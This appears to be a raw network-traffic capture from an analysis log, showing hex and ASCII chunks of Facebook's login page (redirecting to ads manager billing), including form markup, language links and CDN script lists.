                                                                                                                                  2022-10-17 20:07:01 UTC244INData Raw: 76 33 34 37 6b 37 53 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 36 34 36 32 22 2c 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 33 4e 67 57 52 59 4e 76 7a 58 51 77 31 65 62 43 49 32 78 6a 54 6a 36 30 66 38 4d 6b 5f 61 53 69 4e 36 32 74 67 6f 39 72 4c 64 76 45 6f 41 62 30 4f 35 34 36 4b 43 58 51 37 69 6f 77 33 46 2d 66 73 71 79 33 55 44 47 30 5a 47 73 34 67 6f 62 77 61 76 33 34 37 6b 37 53 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 36 36 33 33 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75
                                                                                                                                  Data Ascii: v347k7SQ"]},-1],["cr:896462",["setIntervalAcrossTransitionsBlue"],{"__rc":["setIntervalAcrossTransitionsBlue","Aa3NgWRYNvzXQw1ebCI2xjTj60f8Mk_aSiN62tgo9rLdvEoAb0O546KCXQ7iow3F-fsqy3UDG0ZGs4gobwav347k7SQ"]},-1],["cr:986633",["setTimeoutAcrossTransitionsBlu
                                                                                                                                  2022-10-17 20:07:01 UTC245INData Raw: 6f 75 73 65 6f 76 65 72 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 6f 75 74 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 77 68 65 65 6c 22 3a 31 2c 22 4d 53 50 6f 69 6e 74 65 72 4d 6f 76 65 22 3a 31 30 30 30 30 2c 22 6b 65 79 64 6f 77 6e 22 3a 30 2e 31 2c 22 63 6c 69 63 6b 22 3a 30 2e 30 32 2c 22 6d 6f 75 73 65 75 70 22 3a 30 2e 30 32 2c 22 5f 5f 31 30 30 6d 73 22 3a 30 2e 30 30 31 2c 22 5f 5f 64 65 66 61 75 6c 74 22 3a 35 30 30 30 2c 22 5f 5f 6d 69 6e 22 3a 31 30 30 2c 22 5f 5f 69 6e 74 65 72 61 63 74 69 6f 6e 44 65 66 61 75 6c 74 22 3a 32 30 30 2c 22 5f 5f 65 76 65 6e 74 44 65 66 61 75 6c 74 22 3a 31 30 30 30 30 30 7d 2c 22 70 61 67 65 5f 73 61 6d 70 6c 69 6e 67 5f 62 6f 6f 73 74 22 3a 31 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 72 65 67 65 78 65 73 22 3a
                                                                                                                                  Data Ascii: ouseover":10000,"mouseout":10000,"mousewheel":1,"MSPointerMove":10000,"keydown":0.1,"click":0.02,"mouseup":0.02,"__100ms":0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":
                                                                                                                                  2022-10-17 20:07:01 UTC247INData Raw: 39 61 78 2d 20 5f 39 61 78 5f 20 5f 39 61 79 31 20 55 49 50 61 67 65 5f 4c 6f 67 67 65 64 4f 75 74 20 68 61 73 42 61 6e 6e 65 72 20 5f 2d 6b 62 20 5f 36 30 35 61 20 62 5f 63 33 70 79 6e 2d 61 68 68 20 63 68 72 6f 6d 65 20 77 65 62 6b 69 74 20 77 69 6e 20 78 31 20 4c 6f 63 61 6c 65 5f 65 6e 5f 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 78 46 67 69 6a 41 33 64 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 62 6f 6f 74 73 74 72 61 70 57 65 62 53 65 73 73 69 6f 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 6a 28 31 36 36 36 30 33 37 32 32 31 29 7d 29 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 6c 69 22 20 69 64 3d 22 75 5f
                                                                                                                                  Data Ascii: 9ax- _9ax_ _9ay1 UIPage_LoggedOut hasBanner _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_US" dir="ltr"><script type="text/javascript" nonce="xFgijA3d">requireLazy(["bootstrapWebSession"],function(j){j(1666037221)})</script><div class="_li" id="u_
                                                                                                                                  2022-10-17 20:07:01 UTC248INData Raw: 6f 66 66 22 20 69 64 3d 22 65 72 72 6f 72 5f 62 6f 78 22 20 2f 3e 3c 64 69 76 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 64 69 73 70 6c 61 79 22 20 6e 61 6d 65 3d 22 64 69 73 70 6c 61 79 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 69 73 70 72 69 76 61 74 65 22 20 6e 61 6d 65 3d 22 69 73 70 72 69 76 61 74 65 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 72 65 74 75 72 6e 5f
                                                                                                                                  Data Ascii: off" id="error_box" /><div id="loginform"><input type="hidden" autocomplete="off" id="display" name="display" value="" /><input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value="" /><input type="hidden" autocomplete="off" id="return_
                                                                                                                                  2022-10-17 20:07:01 UTC250INData Raw: 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 74 22 3e 3c 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 22 31 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 32 65 30 20 5f 34 6a 79 36 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 22 20 69 64 3d 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 4c 6f 67 20 49 6e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 76 20 66 73 6d 20 66 77 6e 20 66 63 67 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 6c 69 6e 6b 22 3e 3c 61 20
                                                                                                                                  Data Ascii: /div></div></a></div></div></div></div><div class="_xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Log In</button></div><div class="_xkv fsm fwn fcg" id="login_link"><a
                                                                                                                                  2022-10-17 20:07:01 UTC251INData Raw: 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 67 65 28 22 65 6d 61 69 6c 22 29 2c 63 3d 67 65 28 22 70 61 73 73 22 29 3b 74 72 79 7b 62 26 26 21 62 2e 76 61 6c 75 65 3f 62 2e 66 6f 63 75 73 28 29 3a 63 26 26 63 2e 66 6f 63 75 73 28 29 7d 63 61 74 63 68 28 61 29 7b 69 66 28 21 28 61 2e 6e 75 6d 62 65 72 3d 3d 2d 32 31 34 36 38 32 36 31 37 38 29 29 74 68 72 6f 77 20 61 7d 72 65 74 75 72 6e 20 61 26 26 61 2e 63 61 6c 6c 28 77 69 6e 64 6f 77 29 7d 7d 28 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 29 3b 66 75 6e 63 74 69 6f 6e 20 70 6f 70 28 61 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 6c 6f 61 64 5f 6f 6e 5f 6e 65 77 5f 63 6f 6f 6b 69 65 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b
                                                                                                                                  Data Ascii: ){return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){
                                                                                                                                  2022-10-17 20:07:01 UTC252INData Raw: 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 66 72 5f 46 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 66 72 2d 66 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68
                                                                                                                                  Data Ascii: book.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=h
                                                                                                                                  2022-10-17 20:07:01 UTC254INData Raw: 28 50 6f 72 74 75 67 61 6c 29 22 3e 50 6f 72 74 75 67 75 c3 aa 73 20 28 50 6f 72 74 75 67 61 6c 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 71 2d 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c
                                                                                                                                  Data Ascii: (Portugal)">Portugus (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieL
                                                                                                                                  2022-10-17 20:07:01 UTC255INData Raw: 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 36 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 72 74 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 2d 61 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f
                                                                                                                                  Data Ascii: &quot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">Trke</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" o
                                                                                                                                  2022-10-17 20:07:01 UTC257INData Raw: 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 39 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 20 28 43 68 69 6e 61 29 22 3e e4 b8 ad e6 96 87 28 e7 ae 80 e4 bd 93 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 31 37 69 20 5f 35 31 37 68 20 5f 35 31 73 79 22 20 72 65 6c 3d 22 64 69 61 6c 6f 67 22 20 61 6a 61
                                                                                                                                  Data Ascii: ds\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)">()</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" aja
                                                                                                                                  2022-10-17 20:07:01 UTC258INData Raw: 73 3a 2f 2f 77 77 77 2e 6f 63 75 6c 75 73 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 4f 63 75 6c 75 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 4f 63 75 6c 75 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 72 74 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 46 61 63 65 62 6f 6f 6b 20 50 6f 72 74 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 6f 72 74 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 25 33 41 25 32 46 25
                                                                                                                                  Data Ascii: s://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%
                                                                                                                                  2022-10-17 20:07:01 UTC260INData Raw: 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 43 72 65 61 74 65 20 61 20 70 61 67 65 22 3e 43 72 65 61 74 65 20 50 61 67 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 44 65 76 65 6c 6f 70 20 6f 6e 20 6f 75 72 20 70 6c 61 74 66 6f 72 6d 2e 22 3e 44 65 76 65 6c 6f 70 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 63 61 72 65 65 72 73 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 4d 61 6b 65 20 79 6f 75 72 20 6e 65 78 74 20 63 61 72 65 65 72 20 6d 6f 76 65 20 74 6f 20 6f 75 72 20 61 77 65 73 6f 6d 65 20 63 6f 6d 70 61 6e 79 2e 22 3e 43 61 72 65 65 72 73 3c
                                                                                                                                  Data Ascii: _footer" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers<
                                                                                                                                  2022-10-17 20:07:01 UTC261INData Raw: 69 66 22 20 77 69 64 74 68 3d 22 30 22 20 68 65 69 67 68 74 3d 22 30 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 2f 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 62 78 44 61 74 61 22 3a 7b 22 38 37 35 32 33 31 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 79 44 5c 2f 72 5c 2f 64 34 5a 49 56 58 2d 35 43 2d 62 2e 69 63 6f 22 7d 7d 2c 22 63 6c 70
                                                                                                                                  Data Ascii: if" width="0" height="0" style="display:none" /></span></div><div style="display:none"></div><script>requireLazy(["HasteSupportData"],function(m){m.handle({"bxData":{"875231":{"uri":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/yD\/r\/d4ZIVX-5C-b.ico"}},"clp
                                                                                                                                  2022-10-17 20:07:01 UTC263INData Raw: 2c 22 31 38 34 30 38 30 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 6e 59 63 74 6f 54 73 72 37 61 6c 52 69 59 59 67 22 7d 2c 22 31 38 34 38 37 34 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 47 73 48 39 4b 62 2d 33 57 2d 74 61 5a 6e 52 4d 22 7d 2c 22 31 39 30 36 38 37 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 64 49 42 69 56 76 39 62 55 44 58 6c 6d 51 33 63 22 7d 2c 22 31 39 38 35 39 34 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 36 36 4f 6f 35 6c 59 5f 5f 35 77 55 54 70 56 43 41 22 7d 2c 22 35 35 34 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41
                                                                                                                                  Data Ascii: ,"1840809":{"result":false,"hash":"AT5nYctoTsr7alRiYYg"},"1848749":{"result":false,"hash":"AT5GsH9Kb-3W-taZnRM"},"1906871":{"result":false,"hash":"AT6dIBiVv9bUDXlmQ3c"},"1985945":{"result":true,"hash":"AT66Oo5lY__5wUTpVCA"},"5541":{"result":true,"hash":"A
                                                                                                                                  2022-10-17 20:07:01 UTC264INData Raw: 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 37 4d 35 34 5c 2f 79 4b 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 37 58 46 72 73 4d 5a 61 6d 76 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 76 47 74 32 6d 78 7a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 67 5c 2f 72 5c 2f 6c 5f 64 45 45 6c 4a 69 42 43 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 52 30 72 48 69 64 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c
                                                                                                                                  Data Ascii: https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7M54\/yK\/l\/en_US\/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz"},"vGt2mxz":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yg\/r\/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz"},"R0rHidL":{"type":"js","src":"https:\/\
                                                                                                                                  2022-10-17 20:07:01 UTC266INData Raw: 72 63 2e 70 68 70 5c 2f 76 33 69 4c 6c 35 34 5c 2f 79 6e 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 55 39 69 37 53 4d 63 77 48 36 73 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6f 5c 2f 75 6e 79 72 6e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 43 5c 2f 72 5c 2f 65 47 61 68 6c 57 63 78 56 6c 6e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 65 4d 6b 4d 78 48 5a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f
                                                                                                                                  Data Ascii: rc.php\/v3iLl54\/yn\/l\/en_US\/U9i7SMcwH6s.js?_nc_x=Ij3Wp8lg5Kz"},"o\/unyrn":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/eGahlWcxVln.js?_nc_x=Ij3Wp8lg5Kz"},"eMkMxHZ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/
                                                                                                                                  2022-10-17 20:07:01 UTC267INData Raw: 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 71 31 6a 53 5a 38 63 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 72 5c 2f 46 31 6e 57 6d 57 61 42 4f 65 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6a 51 37 6e 5c 2f 39 6a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 79 4e 59 63 63 35 65 43 6a 75 79 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c
                                                                                                                                  Data Ascii: _nc_x=Ij3Wp8lg5Kz"},"q1jSZ8c":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yH\/r\/F1nWmWaBOeO.js?_nc_x=Ij3Wp8lg5Kz"},"jQ7n\/9j":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/yNYcc5eCjuy.js?_nc_x=Ij3Wp8lg5Kz"},
                                                                                                                                  2022-10-17 20:07:01 UTC269INData Raw: 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 33 5c 2f 72 5c 2f 74 6a 51 34 46 48 5a 4e 42 5a 49 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 79 68 6d 4d 4b 66 50 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 76 43 36 34 5c 2f 79 71 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 34 5a 6a 6d 33 64 75 5a 47 72 51 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 46 4a 76 47 4b 5c 2f 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e
                                                                                                                                  Data Ascii: .fbcdn.net\/rsrc.php\/v3\/y3\/r\/tjQ4FHZNBZI.js?_nc_x=Ij3Wp8lg5Kz"},"yhmMKfP":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ivC64\/yq\/l\/en_US\/4Zjm3duZGrQ.js?_nc_x=Ij3Wp8lg5Kz"},"FJvGK\/j":{"type":"css","src":"https:\/\/static.xx.fbcdn.
                                                                                                                                  2022-10-17 20:07:01 UTC270INData Raw: 2f 79 51 5c 2f 72 5c 2f 77 34 48 5f 31 59 71 67 70 4c 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 32 47 70 61 6b 5c 2f 31 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 65 58 75 34 5c 2f 79 31 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 58 4e 36 4d 39 6b 79 61 4b 52 58 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 69 46 75 50 62 57 68 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 61 5c 2f 72 5c 2f
